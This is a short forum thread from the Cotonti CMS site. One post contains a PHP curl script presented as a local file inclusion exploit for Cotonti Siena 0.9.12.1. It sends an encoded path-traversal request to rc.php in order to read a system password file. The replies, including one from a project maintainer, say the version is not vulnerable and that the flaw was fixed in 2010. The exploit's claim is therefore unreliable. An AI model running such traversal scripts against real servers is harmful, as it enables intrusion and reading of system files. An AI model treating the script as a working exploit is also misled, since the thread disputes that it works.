cotonti.com : Siena LFI hacking
https://www.cotonti.com
Latest topic posts, Cotonti, en, Fri, 28 Nov 2025 21:43:56 -0000

Trustmaster Seriously, this was fixed in 2010. It is incorrect to say that 0.9.12.1 is vulnerable.

Mon, 18 Feb 2013 18:24:37 -0000
tensh Does it work on previous Sienas? How to prevent it? Can I just delete this file?

Mon, 18 Feb 2013 08:43:11 -0000
Xerora This won't work on 0.9.12.1. It seems like this has been the case for many versions before 0.9.12.1 as well, as far as I can tell.

edit: removed line that could be misread about the error that it would return

Sun, 17 Feb 2013 06:18:08 -0000
MecTruy LFI attack Cotonti Siena 0.9.12.1 LFI

<?php
/*
 * WWW.PUNISH3R.COM
 * Bug :Cotonti Siena 0.9.12.1 LFI
 * Author(Pentester) : FreWaL & Dr.Ly0n
 * Special Thanks : Z0rLu, MaXtoR, MecTruy, Polonia, Monarchy, Eno7, RedWorm, R00tk!d, Harded, The_Mirkin and PUNISH3R all special user
 *
 */
$hedef = "http://hedefsite.com";
$dosya = ".%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2Fetc%2Fpassword";
$curl = curl_init();
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl, CURLOPT_URL, "http://$hedef/rc.php?rc=".$dosya);
curl_setopt($curl, CURLOPT_HTTPGET, 1);
curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($curl, CURLOPT_TIMEOUT, 3);
curl_setopt($curl, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($curl, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($curl, CURLOPT_COOKIEJAR, "/tmp/cookie_$hedef");
$cikti = curl_exec ($curl);
curl_close($curl);
unset($curl);
echo $cikti;
?>

 

Sun, 17 Feb 2013 00:39:47 -0000